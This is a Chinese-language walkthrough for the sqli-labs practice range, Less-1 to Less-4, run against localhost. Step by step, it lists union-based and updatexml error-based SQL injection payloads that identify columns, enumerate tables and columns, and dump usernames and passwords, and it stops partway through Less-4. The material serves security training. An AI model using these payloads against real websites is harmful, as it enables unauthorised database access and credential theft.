sqli-labs靶场通关攻略

标签：127.0 http 攻略 Less 0.1 labs sqli --+ id

Less-1

sql手工注入攻击流程

步骤一：确定攻击点，确定网站可以注入的参数

http://127.0.0.1/Less-1/?id=1

步骤二：判断闭合方式 ' --+

步骤三：判断字段列数 order by

1.
http://127.0.0.1/Less-1/?id=1' order by 3 --+ 页面正常说明存在3列

2.
http://127.0.0.1/Less-1/?id=1' order by 4 --+ 页面不正常说明存在3列

步骤四：联合查询查当前数据库名，数据库用户

1.联合查询3列

http://127.0.0.1/Less-1/?id=1' union select 1,2,3 --+ 页面显示的是id=1的数据，没有显示我们联合查询的数据

2.页面上显示联合查询的回显点

把前面查询的id的数据改成不存在的，比如-1

http://127.0.0.1/Less-1/?id=-1' union select 1,2,3 --+

3.联合查询数据库名和用户名

http://127.0.0.1/Less-1/?id=-1' union select 1,database(),user() --+

步骤五：联合查询查出网站的数据库里面的所有表名

http://127.0.0.1/Less-1/?id=-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤六：联合查询查出users表里面的所有列

http://127.0.0.1/Less-1/?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤七：查询表中所有的数据

http://127.0.0.1/Less-1/?id=-1' union select 1,2,group_concat(id,'-',username,'-',password) from users --+

Less-2

报错注入流程

前提：只要网站有报错语句就能进行报错查询

步骤一：http://127.0.0.1/Less-2/?id=1' 跟个单引号引起报错说明页面有报错语句的位置

步骤二：测试闭合注释为

http://127.0.0.1/Less-2/?id=1--+

步骤三：http://127.0.0.1/Less-2/?id=1 and updatexml(1,1,1) --+ 使用报错函数，报错函数里面三个参数，写三个1占位置

步骤四：http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,1),1) --+ 我们可以操控的是第二个参数的位置，所以第二个参数的位置换成concat()函数，这个函数也有两个参数，写两个1占位置

步骤五：http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,(select database())),1) --+我们可以操控的地方也是第二个参数的位置把第二个参数的位置换成()，里面写我们的子查询语句成功查出数据库名后面查什么在子查询括号里面查就行

步骤五：查表名：http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=’security‘)),1) --+

步骤六：查列名：'http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users')),1) --+

步骤七：查具体的username和password

http://127.0.0.1/Less-2/?id=1 and updatexml(1,concat(1,(select group_concat(username,password) from users)),1)--+

Less-3

步骤一：确定攻击点，确定网站可以注入的参数

步骤二：判断闭合方式 ') --+

步骤三：判断字段列数 order by

1.
http://127.0.0.1/Less-3/?id=1') order by 3 --+ 页面正常说明存在3列

2.
http://127.0.0.1/Less-3/?id=1') order by 4 --+ 页面不正常说明存在3列

步骤四：联合查询查当前数据库名，数据库用户

1.联合查询3列

http://127.0.0.1/Less-3/?id=1') union select 1,2,3 --+ 页面显示的是id=1的数据，没有显示我们联合查询的数据

2.页面上显示联合查询的回显点

把前面查询的id的数据改成不存在的，比如-1

http://127.0.0.1/Less-3/?id=-1') union select 1,2,3 --+

3.联合查询数据库名和用户名

http://127.0.0.1/Less-3/?id=-1') union select 1,database(),user() --+

步骤五：联合查询查出网站的数据库里面的所有表名

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤六：联合查询查出users表里面的所有列

http://127.0.0.1/Less-3/?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+

步骤七：查询表中所有的数据

http://127.0.0.1/Less-3/?id=-1') union select 1,2,group_concat(id,'~',username,'~',password) from users --+

Less-4

步骤一：确定攻击点，确定网站可以注入的参数

步骤二：判断闭合方式 ") --+

步骤三：判断字段列数 order by

1.
http://127.0.0.1/Less-4/?id=1") order by 3 --+ 页面正常说明存在3列

2.
http://127.0.0.1/Less-4/?id=1") order by 4 --+ 页面不正常说明存在3列

步骤四：联合查询查当前数据库名，数据库用户

1.联合查询3列

http://127.0.0.1/Less-4/?id=1") union select 1,2,3 --+ 页面显示的是id=1的数据，没有显示我们联合查询的数据

2.页面上显示联合查询的回显点

把前面查询的id的数据改成不存在的，比如-1

http://127.0.0.1/Less-4/?id=-1") union select 1,2,3 --+

3.联合查询数据库名和用户名

http://127.0.0.1/Less-4/?id=-1") union select 1,database(),user() --+

步骤五：联合查询查出网站的数据库里面的所有表名

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

步骤六：联合查询查出users表里面的所有列

http://127.0.0.1/Less-4/?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+